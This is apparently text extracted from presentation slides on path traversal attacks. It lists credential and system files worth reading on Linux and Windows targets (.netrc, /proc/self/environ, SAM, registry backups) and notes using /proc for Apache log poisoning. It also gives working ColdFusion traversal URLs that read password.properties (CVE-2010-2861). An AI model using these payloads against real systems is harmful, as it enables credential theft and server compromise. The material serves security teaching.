4. Common understanding of path traversal
A Path Traversal attack aims to access files and directories that are stored outside
the web root folder.
(OWASP)
WHAT FILES AND DIRS OUTSIDE THE
WEB ROOT DO WE NEED AND WHY?
9. .netrc file
• Provides remember me for ftp
What I had when checked /home/username/.netrc :
machine ftp.server.com
login secret_usr
password secret_pwd
10. Help for shell uploading
/proc/self/environ /proc/self/status
Useful if we wanna
find access or error
logs of Apache,
document root of the
server or we also have
LFI and wanna exploit
Apache log poisoning
14. File Expected Contents / Description
%SYSTEMDRIVE%boot.ini A file that can be counted on to be on virtually every
windows host. Helps with confirmation that a read is
happening.
%WINDIR%win.ini This is another file to look for if boot.ini isn’t there or
coming back, which is sometimes the case.
%SYSTEMROOT%repairSAM
%SYSTEMROOT%System32configR
egBackSAM
It stores users' passwords in a hashed format (in LM
hash and NTLM hash). The SAM file in repair is locked,
but can be retired using forensic or Volume Shadow copy
methods
%SYSTEMROOT%repairsystem
%SYSTEMROOT%System32configR
egBacksystem
%SYSTEMDRIVE%autoexec.bat
15. %SYSTEMDRIVE%pagefile.sys Large file, but contains
spill over from RAM,
usually lots of good
information can be
pulled, but should be a
last resort due to size
%WINDIR%system32logfileshttperrhttperr1.log IIS 6 error log
%SystemDrive%inetpublogsLogFiles IIS 7’s logs location
%WINDIR%system32logfilesw3svc1exY
YMMDD.log (year month day)
%WINDIR%system32configAppEvent.Evt
%WINDIR%system32configSecEvent.Evt
%WINDIR%system32configdefault.sav
%WINDIR%system32configsecurity.sav
%WINDIR%system32configsoftware.sav
%WINDIR%system32configsystem.sav
%WINDIR%system32CCMlogs*.log
%USERPROFILE%ntuser.dat
19. Also for cold fusion(not the last vers but still)
ColdFusion 6:
http://site/CFIDE/administrator/enter.cfm?locale=................CFusionMXlibpassword.
properties%00en
ColdFusion 7:
http://site/CFIDE/administrator/enter.cfm?locale=................CFusionMX7libpasswor
d.properties%00en
ColdFusion 8
http://site/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libpasswor
d.properties%00en
All versions:
http://site/CFIDE/administrator/enter.cfm?locale=....................JRun4serverscfusio
ncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en
http://www.cvedetails.com/cve/CVE-2010-2861/
20. • In case if you still don’t have path traversal to
post exploit it, may be this tool could be useful
for you: http://dotdotpwn.blogspot.ru/